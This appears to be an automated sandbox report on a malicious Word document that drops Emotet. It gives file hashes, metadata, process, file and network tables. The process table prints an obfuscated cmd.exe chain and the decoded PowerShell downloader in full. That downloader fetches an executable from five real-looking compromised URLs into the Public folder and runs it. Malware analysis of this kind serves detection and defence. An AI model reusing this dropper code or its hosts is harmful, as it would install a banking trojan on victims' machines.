File name: | sample.doc |
Full analysis: | https://app.any.run/tasks/3660f59d-7a31-497b-8338-b295ff1d70c5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2019, 19:42:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 12:26:00 2019, Last Saved Time/Date: Tue Jan 15 12:26:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 0F73FB479DB4FF15AB386771770C8FD7 |
SHA1: | 5317F63C3AEE3D88005BE1E21A6C410C041A5C21 |
SHA256: | 41F18EF5935884B4B39BAC9C5751CC67B92C2516AB71A6885F92D5BCCA7AD4D0 |
SSDEEP: | 3072:H38GhDS0o9zTGOZD6EbzCdhbt+tvorTwFqS8:HtoUOZDlbehbKU |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:15 12:26:00 |
ModifyDate: | 2019:01:15 12:26:00 |
Pages: | 1 |
Words: | - |
Characters: | 3 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 3 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sample.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4032 | "C:\Windows\system32\cmd.exe" /c %PROGRAmdaTA:~0,1%%pRograMData:~9,2% /V /c " sET 6AI=pod^%PUBLIC:~],1^%r^%SESSIONNAME:~-4,1^%h^%}EMP:~-3,1^%ll $Californiara='MoviesOut8oorssp'?$metho8ologyjj=ned-o`je;t Net.We`Client?$PersonalLoanA;;ountha='http://ddd.unitepro.mpG/PyZ}G;_yPRHBR0pG_ik0a#}hjhttp://ddd.nkalitin.ru/3ghp_#E]B]_77azuhjhttp://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhjhttp://ddd.li8stroy.ru/a8f8l_tnv#5CChjhttp://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26'.Split('hj')?$8epositp8='Be8for8shiredj'?$In;re8i`leqm = ']09'?3bb5484c-acd3-5883-ae5d-000aa204eed3 ran8`u='Liaisonjj'?$}oolsIn8ustrialBooksit=$env:pu`li;+'\'+$In;re8i`leqm+'.epGe'?forea;h($hapti;om in $PersonalLoanA;;ountha)xtryx$metho8ologyjj.5odnloa8#ile($hapti;om, $}oolsIn8ustrialBooksit)?$Sdiss#ran;zh='`luetoothio'?If ((Get-Item $}oolsIn8ustrialBooksit).length -ge o00000) xInvoke-Item $}oolsIn8ustrialBooksit?$supply;hainsoh=';ompressinghz'?`reak?[[;at;hx[[$#ordar8ji='in8epGingj8'?&& SeT d6Fw=!6AI:hj=@!&& seT O3A=!d6Fw:x={!& SeT u87E=!O3A:HBR=X!&& sET OL=!u87E:;=c!&sET pGDP=!OL:pG=x!&& seT F46b=!pGDP:?=;!&SeT FH0K=!F46b:DLA=H!& sET gz=!FH0K:d=w!& SET 4WcY=!gz:8=d!& Set v2p=!4WcY:#=F!& set uLd=!v2p:o0=8!&& set Z8=!uLd:5=D!&& set 1Hul=!Z8:`=b!&& Set fK=!1Hul:]=5!&sEt puQY=!fK:}=T!& SET VA=!puQY:[=}!&echO %VA% | C%TEMp:~-2,-1%%aLLuSerSprOFIle:~10,1% " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2540 | CmD /V /c " sET 6AI=pod^%PUBLIC:~],1^%r^%SESSIONNAME:~-4,1^%h^%}EMP:~-3,1^%ll $Californiara='MoviesOut8oorssp'?$metho8ologyjj=ned-o`je;t Net.We`Client?$PersonalLoanA;;ountha='http://ddd.unitepro.mpG/PyZ}G;_yPRHBR0pG_ik0a#}hjhttp://ddd.nkalitin.ru/3ghp_#E]B]_77azuhjhttp://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhjhttp://ddd.li8stroy.ru/a8f8l_tnv#5CChjhttp://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26'.Split('hj')?$8epositp8='Be8for8shiredj'?$In;re8i`leqm = ']09'?3bb5484c-acd3-5883-ae5d-000aa204eed3 ran8`u='Liaisonjj'?$}oolsIn8ustrialBooksit=$env:pu`li;+'\'+$In;re8i`leqm+'.epGe'?forea;h($hapti;om in $PersonalLoanA;;ountha)xtryx$metho8ologyjj.5odnloa8#ile($hapti;om, $}oolsIn8ustrialBooksit)?$Sdiss#ran;zh='`luetoothio'?If ((Get-Item $}oolsIn8ustrialBooksit).length -ge o00000) xInvoke-Item $}oolsIn8ustrialBooksit?$supply;hainsoh=';ompressinghz'?`reak?[[;at;hx[[$#ordar8ji='in8epGingj8'?&& SeT d6Fw=!6AI:hj=@!&& seT O3A=!d6Fw:x={!& SeT u87E=!O3A:HBR=X!&& sET OL=!u87E:;=c!&sET pGDP=!OL:pG=x!&& seT F46b=!pGDP:?=;!&SeT FH0K=!F46b:DLA=H!& sET gz=!FH0K:d=w!& SET 4WcY=!gz:8=d!& Set v2p=!4WcY:#=F!& set uLd=!v2p:o0=8!&& set Z8=!uLd:5=D!&& set 1Hul=!Z8:`=b!&& Set fK=!1Hul:]=5!&sEt puQY=!fK:}=T!& SET VA=!puQY:[=}!&echO %VA% | CmD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2816 | C:\Windows\system32\cmd.exe /S /D /c" echO %VA% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2924 | CmD | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3396 | powershell $Californiara='MoviesOutdoorssp';$methodologyjj=new-object Net.WebClient;$PersonalLoanAccountha='http://www.unitepro.mx/PyZTGc_yPRX0x_ik0aFT@http://www.nkalitin.ru/3ghp_FE5B5_77azu@http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy@http://www.lidstroy.ru/adfdl_tnvFDCC@http://www.kartonaza-hudetz.hr/LERDIp_zNxmr_9A26'.Split('@');$depositpd='Bedfordshirewj';$Incredibleqm = '509';$brandbu='Liaisonjj';$ToolsIndustrialBooksit=$env:public+'\'+$Incredibleqm+'.exe';foreach($hapticom in $PersonalLoanAccountha){try{$methodologyjj.DownloadFile($hapticom, $ToolsIndustrialBooksit);$SwissFranczh='bluetoothio';If ((Get-Item $ToolsIndustrialBooksit).length -ge 80000) {Invoke-Item $ToolsIndustrialBooksit;$supplychainsoh='compressinghz';break;}}catch{}}$Forwardji='indexingjd'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2432 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A63.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CE8185D.wmf | — | |
MD5:— | SHA256:— | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D6AE773.wmf | — | |
MD5:— | SHA256:— | |||
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QE7Z0HUXEIBRQ39QOPKI.temp | — | |
MD5:— | SHA256:— | |||
2432 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7CC2.tmp | — | |
MD5:— | SHA256:— | |||
2432 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7CC3.tmp | — | |
MD5:— | SHA256:— | |||
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B8FCEAA6B5CB7429D3318E10A21A8DBC | SHA256:2548941F28EBB3CBAEC4DA56907E3CE7AD16E62FFD5F2C1C2C46BA3D4E664F2A | |||
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247540.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3396 | powershell.exe | C:\Users\Public\509.exe | document | |
MD5:36DF9616987F412949FEE98EA9F06C97 | SHA256:C2E393FF568F4A87CE48011F10664138E569710F56DDC0462AA7F36BDAD5ECAD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3396 | powershell.exe | GET | 404 | 75.126.5.21:80 | http://www.unitepro.mx/PyZTGc_yPRX0x_ik0aFT | US | html | 337 b | suspicious |
3396 | powershell.exe | GET | 301 | 213.186.33.3:80 | http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy | FR | html | 258 b | malicious |
3396 | powershell.exe | GET | 403 | 185.26.122.73:80 | http://www.nkalitin.ru/3ghp_FE5B5_77azu | RU | html | 1.14 Kb | malicious |
3396 | powershell.exe | GET | 200 | 213.186.33.3:80 | http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy/ | FR | document | 124 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3396 | powershell.exe | 213.186.33.3:80 | www.jessie-equitation.fr | OVH SAS | FR | malicious |
3396 | powershell.exe | 75.126.5.21:80 | www.unitepro.mx | SoftLayer Technologies Inc. | US | suspicious |
3396 | powershell.exe | 185.26.122.73:80 | www.nkalitin.ru | Hostland LTD | RU | malicious |
Domain | IP | Reputation |
---|---|---|
www.unitepro.mx |
| suspicious |
www.nkalitin.ru |
| malicious |
www.jessie-equitation.fr |
| malicious |